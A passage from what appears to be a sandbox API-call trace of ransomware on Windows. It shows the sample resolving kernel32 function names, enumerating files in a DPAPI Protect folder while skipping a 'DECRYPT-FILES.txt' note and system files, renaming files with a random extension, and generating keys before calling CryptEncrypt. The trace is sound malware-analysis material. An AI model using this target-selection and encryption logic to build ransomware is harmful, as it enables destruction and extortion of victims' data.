lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0078.260] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0078.260] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0078.260] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0078.260] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0078.260] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0078.261] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0078.261] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0078.261] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0078.261] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0078.261] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0078.261] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0078.261] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0078.261] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0078.261] lstrlenA (lpString="CREATETHREAD") returned 12 [0078.261] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0078.261] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0078.261] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0078.261] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0078.261] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0078.261] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0078.261] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0078.261] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0078.261] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0078.261] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0078.261] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0078.261] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0078.261] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0078.261] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0078.261] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0078.261] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0078.261] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0078.261] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0078.261] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0078.261] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0078.261] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0078.261] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0078.262] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0078.262] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0078.262] lstrlenA (lpString="CTRLROUTINE") returned 11 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0078.262] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0078.262] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0078.262] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0078.262] lstrlenA (lpString="DEBUGBREAK") returned 10 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0078.262] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0078.262] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0078.262] lstrlenA (lpString="DECODEPOINTER") returned 13 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0078.262] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0078.262] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0078.262] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0078.262] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0078.262] lstrlenA (lpString="DELETEATOM") returned 10 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0078.262] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0078.262] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0078.262] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0078.263] lstrlenA (lpString="DELETEFIBER") returned 11 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0078.263] lstrlenA (lpString="DELETEFILEA") returned 11 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0078.263] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0078.263] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0078.263] lstrlenA (lpString="DELETEFILEW") returned 11 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0078.263] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0078.263] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0078.263] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0078.263] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0078.263] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0078.263] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0078.263] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0078.263] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0078.263] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0078.263] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0078.263] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0078.263] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0078.263] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0078.263] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0078.264] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0078.264] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0078.264] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0078.264] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0078.264] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0078.264] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0078.264] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0078.264] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0078.264] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0078.264] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0078.264] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0078.264] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0078.264] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0078.264] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0078.264] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0078.264] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0078.264] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0078.264] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0078.264] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0078.265] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0078.265] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0078.265] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0078.265] lstrcpyA (in: lpString1=0x3f2ca78, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0078.265] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0078.265] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9") returned 146 [0078.265] wsprintfW (in: param_1=0x3f2d730, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa") returned 152 [0078.265] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.HyGSa" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.hygsa"), dwFlags=0x0) returned 1 [0078.266] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.266] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.266] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.266] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaad45a00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaad45a00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaad45a00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0078.266] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0078.266] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaad45a00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaad45a00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaad45a00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0078.266] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0078.266] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0078.266] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0078.267] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0078.267] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0078.267] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0078.267] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0078.267] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0078.267] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0078.267] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0078.267] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.267] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0078.267] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0078.267] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0078.267] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0078.267] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 110 [0078.267] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0078.267] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0078.267] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\jkbimi8.tmp" [0078.267] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.267] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0078.267] CloseHandle (hObject=0x0) returned 0 [0078.267] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.268] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x28de3e80, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="Preferred", cAlternateFileName="PREFER~1")) returned 1 [0078.268] lstrcmpiW (lpString1="Preferred", lpString2="DECRYPT-FILES.txt") returned 1 [0078.268] lstrcmpiW (lpString1="Preferred", lpString2="autorun.inf") returned 1 [0078.268] lstrcmpiW (lpString1="Preferred", lpString2="boot.ini") returned 1 [0078.268] lstrcmpiW (lpString1="Preferred", lpString2="desktop.ini") returned 1 [0078.268] lstrcmpiW (lpString1="Preferred", lpString2="ntuser.dat") returned 1 [0078.268] lstrcmpiW (lpString1="Preferred", lpString2="iconcache.db") returned 1 [0078.268] lstrcmpiW (lpString1="Preferred", lpString2="bootsect.bak") returned 1 [0078.268] lstrcmpiW (lpString1="Preferred", lpString2="ntuser.dat.log") returned 1 [0078.268] lstrcmpiW (lpString1="Preferred", lpString2="thumbs.db") returned -1 [0078.268] lstrcmpiW (lpString1="Preferred", lpString2="Bootfont.bin") returned 1 [0078.268] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned 110 [0078.268] lstrlenW (lpString="Preferred") returned 9 [0078.268] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\" [0078.268] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\", lpString2="Preferred" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" [0078.268] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0078.268] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x458 [0078.270] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=24) returned 1 [0078.271] CreateFileMappingW (hFile=0x458, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x45c [0078.271] MapViewOfFile (hFileMappingObject=0x45c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0078.271] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0078.271] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0078.271] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0078.272] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, 